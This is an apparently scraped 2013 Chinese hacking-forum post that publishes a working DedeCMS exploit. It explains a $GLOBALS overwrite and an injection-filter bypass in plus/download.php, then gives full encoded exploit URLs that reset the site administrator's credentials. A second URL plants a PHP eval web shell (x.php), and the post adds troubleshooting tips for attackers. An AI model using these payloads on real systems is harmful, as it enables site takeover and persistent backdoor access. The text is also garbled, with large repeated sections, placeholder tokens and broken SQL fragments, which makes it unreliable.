中国网络渗透测试联盟
标题:
dedecms最新版本修改任意管理员漏洞+getshell+exp
[打印本页]
作者:
admin
时间:
2013-9-21 16:08
标题:
dedecms最新版本修改任意管理员漏洞+getshell+exp
此漏洞无视gpc转义,过80sec注入防御。
3 H' }+ F! {- M: g/ q
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
- x7 j& t% S* [& j" V1 R. V
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
{$ I* o2 N0 ?' e2 V; `
include/dedesql.class.php
: f) _ E+ N X
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
9 {2 s9 I. X1 w5 R4 n0 [
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
$ j% A7 X% o, s+ [5 G, N
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
) G( K3 W+ ~4 l* r% ]$ G7 ` K, |
plus/download.php
_; B' g& k: y' M( ~" A
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location
link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
0 s! Q c- K/ \2 \0 Q4 Y
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
, u: ~% W) |! d8 c% t
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
0 L7 t8 ^( C8 s% P' s; M. |
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
# _7 I; Z0 N9 j4 n. k3 H4 p
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
2 d( i2 t/ [2 r
如果找不到后台,参见以前修改数据库直接拿SHELL的方法
. D8 t1 V ?0 K' _* Q
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。
* h- G3 S7 J9 B& y9 ]. t0 c
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
; D! P, Z8 i- n0 o
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
, Z$ e+ z6 N6 m5 t( u" Y5 k
include/dedesql.class.php
! k8 B; G* t+ l0 }8 U7 ?$ z# \
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
7 G) e' S* u! q) _0 N9 `
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
% Z6 w' Z" J4 V1 B1 N+ |
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
/ |" n7 j d8 E/ r: u
plus/download.php
3 E0 ]3 x1 O9 c" p
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location
link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
0 o% w, ~4 u- `, L+ x7 j6 i8 [0 m3 q
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
# s; M" P1 {9 N+ g
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
- O4 W; r4 a. M' z
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
) N# z% Z- l7 G" t$ Z6 `: M7 B6 K: F
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
) U% u; _# T3 n) u
如果找不到后台,参见以前修改数据库直接拿SHELL的方法
$ a' B: X- B9 l8 b$ N, E( e
___FCKpd___6getshell:
: e5 p) |% v; ^) t8 _2 `
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m
" l* Y8 |# q9 p; h: x. Q8 X" c
http://127.0.0.1/plus/x.php
, Z0 V. \5 G* U6 m) y3 s
update成功后还要访问下 /plus/mytag_js.php?aid=1
% w" [- r9 r+ Y9 J
失败原因:
* E% I1 j% S, n' d( A
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
9 W9 Y4 \( j1 X
配图:
- D$ I6 y9 s$ G4 m1 Q
1.查看dede当前版本
$ r" z# y0 W! c0 J# m" h% ^
" a. ~! H. B9 h3 z$ ?; V
2.执行exp
5 u( A; _8 q7 t7 o- H
5 b1 |$ Y" c6 r2 v( z: @4 F
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png
3.测试登陆后台
: }7 a$ _1 R" e9 B8 h. v; L8 S: P
: x% w2 O, d. l
spider密码admin
& e; q. P9 a' ~* T; X
, ]$ E4 d3 Z) o) ^
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png
' u6 _3 e2 f9 o% {6 r8 ~
原作者:imspider
: J1 ]! r! `+ F/ b0 M* @
4 i. @3 h. a$ ]6 d! R9 l% l- J* n0 x
本博客测试+配图+getshell
' ~8 K& R6 Q8 Z; q/ m% \4 K
POST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT
/ J% j5 M& C# p! J) L
' M! \ R& O2 {4 ?8 U
getshell:
3 ^5 x- Z) |3 T5 K8 h0 D
___FCKpd___7会在plus目录生成 x.php 密码 m
! M9 m" y% K. G4 u0 p0 b
http://127.0.0.1/plus/x.php
' Q3 r4 G$ a" s+ o1 t
update成功后还要访问下 /plus/mytag_js.php?aid=1
$ u, G* N# ~/ _9 Y9 [3 Q/ i
失败原因:
; w6 c' v! g$ R
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
. M) J/ k+ ` |* [8 L. r$ F
配图:
5 o m* U& d- y7 P. d
1.查看dede当前版本
0 s' M4 L+ z2 d% j' p. f9 b
http://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png
, x8 M0 \( Q( Q' |: j( Y, C
2.执行exp
k G5 M, q" V0 x7 B( n- `5 I/ W2 P
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png
3.测试登陆后台
! _( f! w4 i& D7 R$ q M) F
spider密码admin
2 w) k! \' U1 @1 B) S' T
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png
r! r: W. [+ ~! K
: ]9 y( ^7 W4 ?
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2
link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):0 o% w, ~4 u- `, L+ x7 j6 i8 [0 m3 q